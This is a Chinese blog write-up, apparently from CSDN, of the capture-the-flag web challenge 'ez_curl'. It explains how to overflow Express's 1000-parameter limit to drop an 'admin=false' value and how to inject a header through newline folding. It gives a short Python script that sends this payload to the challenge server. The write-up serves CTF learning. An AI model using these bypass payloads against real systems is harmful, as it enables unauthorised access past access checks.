WEB:ez_curl

最新推荐文章于 2024-06-12 21:10:39 发布
最新推荐文章于 2024-06-12 21:10:39 发布
阅读量351 收藏 1
点赞数
分类专栏: 攻防世界 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsumall04/article/details/131849783
版权

背景知识

        Express框架

题目

打开题目发现,进行代码审计

 

第一点:来自源代码的这一行。当我们传入的参数超过1000个时,之后的参数会被舍弃掉。于是这里我们最开始发个"admin":"t"设置好admin的值,加上999个没用的参数,把程序拼接的&admin=false挤掉,即可绕过过滤。

第二点:header 字段可以通过在每一行前面至少加一个SP 或 HT 来扩展到多行。以此绕过对 headers 的过滤
python脚本如下:

import requests
import json
from abc import ABC
from flask.sessions import SecureCookieSessionInterface

url = "http://61.147.171.105:61103/"

datas = {"headers": ["xx:xx\nadmin: true", "Content-Type: application/json"],
         "params": {"admin": "true"}}

for i in range(1020):
    datas["params"]["x" + str(i)] = i

headers = {
    "Content-Type": "application/json"
}
json1 = json.dumps(datas)
print(json1)
resp = requests.post(url, headers=headers, data=json1)

print(resp.content)

 得到flag

参考学习链接:

【愚公系列】2023年06月 攻防世界-Web(ez_curl)_愚公搬代码的博客-CSDN博客

sleepywin
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【愚公系列】2023年06月 攻防世界-Webez_curl
时光隧道
06-13 5871
Express是一个流行的Node.js Web框架,它提供了许多有用的功能来构建Web应用程序。其中之一是参数解析,它允许开发者解析HTTP请求中的参数。Express提供了许多选项来配置参数解析。其中之一是parameterLimit选项。parameterLimit选项用于指定query string或者request payload的最大数量。默认情况下,它的值是1000。如果你的应用程序需要解析大量的查询字符串或者请求负载,你可能需要增加这个限制。
攻防世界ez_curl
s_hiy_iyi的博客
09-19 464
当Content-Type为application/x-www-form-urlencoded且提交方法是POST方法时,2、加上媒体类型信息:Content-Type: application/x-www-form-urlencoded。substr() 函数返回字符串的一部分。$_POST数据与php://input数据是一致的。,要绕过这个设置,admin不能是false。array()函数是用来创建一个PHp数组。SP指的是空格,HT指的是制表符。1、GET修改为POST方法。
【攻防世界】ezbypass-cat
wangzhemvp的博客
04-11 216
突然想到有可能是权限绕过的问题,因为以login开头的登录界面一般是白名单,原理简单来说就是访问白名单目录login.html,然后通过…/回到正常目录下,再访问flag.html。
攻防世界web题目记录(一)
wanan的博客
10-06 2666
攻防世界web题目记录(一)
【攻防世界】学习记录-web(系数4)
龟速更新的九某人
10-12 1447
【攻防世界】学习记录-web(系数4) 0072 Cat 0097 Confusion1 0223 FlatScience 0992 题目名称-文件包含
攻防世界之Web新手练习篇
m0_63944500的博客
11-19 2173
写给刚接触CTF的萌新,感谢支持,谨以此文献给去年的自己。
Enterprise-Web3.0:适用于Web3.0:trade_mark:的Enterprise:trade_mark:
02-01
curl https://raw.githubusercontent.com/joaomilho/Enterprise-Web3.0/master/examples/fdcFizzBuzzDelegator.E™ > fdcFizzBuzzDelegator.E:trade_mark: npx ETM eval fdcFizzBuzzDelegator.E:trade_mark: 涡轮...
PerfDemo::page_with_curl:收集Web应用程序和服务以学习自动化和性能测试
04-09
:check_mark: 演示Web应用程序和服务的集合,以学习自动化和性能。 :stop_sign: 在使用以下网站时,请不要增加任何负载。 :globe_with_meridians: 网路应用程式 ...
resume::page_with_curl:雇用我! 用jekyll构建的简历,并托管在https上
05-01
恢复 :page_with_curl: 雇用我! 用和构建的 :globe_showing_Americas: 或 :milky_way: !See LICENSE file for original license.@insanj/resume Copyright (C) 2018. Julian (insanj) WeissThis program is free ...
smarkt::page_with_curl:超可读的纯文本结构
05-18
:page_with_curl: smarkt 用于在纯文本中定义字段和值的超可读结构用法将一些结构化的纯文本(包括Markdown和YAML)转换为JSON,反之亦然。 对存档和可读性超级有用。 与Kirby的具有奇偶性。 var smarkt = require ...
UACWhitelistTool::page_with_curl:UAC白名单小工具!
02-04
XIU2 / UACWhitelistTool 一个可以添加UAC白名单的小工具! 如果您为了安全而不想完全关闭UAC,但是又觉得每次运行一些必须以管理员身份运行的软件时UAC提示很烦,那么你就可以用UAC白名单小工具把这些软件添加到UAC...
XCTF(攻防世界)—进阶web题Write Up(一)
Lemon's blog
08-20 1633
前言:这段时间做了一些XCTF的web进阶题,真的是学习到了很多知识,就来总结一下。 Cat 一开始以为是命令注入,恰好最近学习了命令注入,就先来测试一下: 输入127.0.0.1,发现是可以ping通的 输入127.0.0.1 | phpinfo() 或127.0.0.1 & net user就会显示: Invalid URL 看来命令注入的方法是行不通的(其他连接符也被过滤了,如...
【攻防世界】Cat
wangzhemvp的博客
04-11 368
2.在url中输入%79,变成y 了。说明服务器对我们输入的内容会进行 url解码 并显示到url上。url 编码使用的是 16 进制,80 也就是 128,ASCII 码是从 0-127,所以传递。当且仅当文件中存在中文字符的时候,Django 才会报错导致获取文件内容。django编码方式为gbk,超过了ascii码范围就会报错。3.从报错信息中,要知道 Django 框架。1.知道是命令行,可以ping操作,可以。没反应,说明过滤了。4.通过报错,可以获取信息。当作绝对路径请求,来读取文件。
攻防世界--lottery、ez_curl、ics-05
最新发布
qq_75120258的博客
06-12 837
array()函数是用来创建一个PHP数组json_decode :对 JSON 格式的字符串进行解码,转换为 PHP 变量。
攻防世界web-Cat
m0_68074153的博客
07-30 958
攻防世界web-Cat
攻防世界刷题小记
m0_73728268的博客
10-10 653
攻防世界刷题小记
【攻防世界】网鼎杯2018 Web fakebook
DG_s1mple
12-31 919
curl_init:初始化新的会话,返回 cURL 句柄,供curl_setopt()、 curl_exec() 和 curl_close() 函数使用。:会传入一个url值,就是我们输入的blog值,然后会curl这个url,把url返回的内容输出到页面上,curl是可以使用file协议来包含文件的。这里给了一个链接说是博客页面,猜测就是这里使用了curl获取页面,暂时还不知道怎么利用,我们再看看有没有什么能提供思路的地方。是一段序列化后的字符串,那思路就很明确了,我们需要反序列化他,传入恶意的代码。
CTF笔记 攻防世界 fakebook
qq_51248658的博客
10-10 1263
第一次做,拿到题目一开始就被注册难住了,blog该填啥???于是忍不住直接就去看wp了。。。。。。后面过了一段时间再去做发现,除了注册,后面还是没有思路,只是隐约记得有个反序列化。。。。这里就记一下,加深以下印像。第一次认真跟着大佬的wp一步步做下来,学到了很多,sql注入那里还是有些薄弱,判断闭合的时候总想不到直接空格,多积累吧。。。。
curl: symbol lookup error: curl: undefined symbol: curl_mime_free
06-06
当遇到 "curl: symbol lookup error: curl: undefined symbol: curl_mime_free" 这样的错误,通常是由于Curl库(一个流行的用于传输数据的客户端)在链接时找不到curl_mime_free这个函数。这可能有以下几个原因: 1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值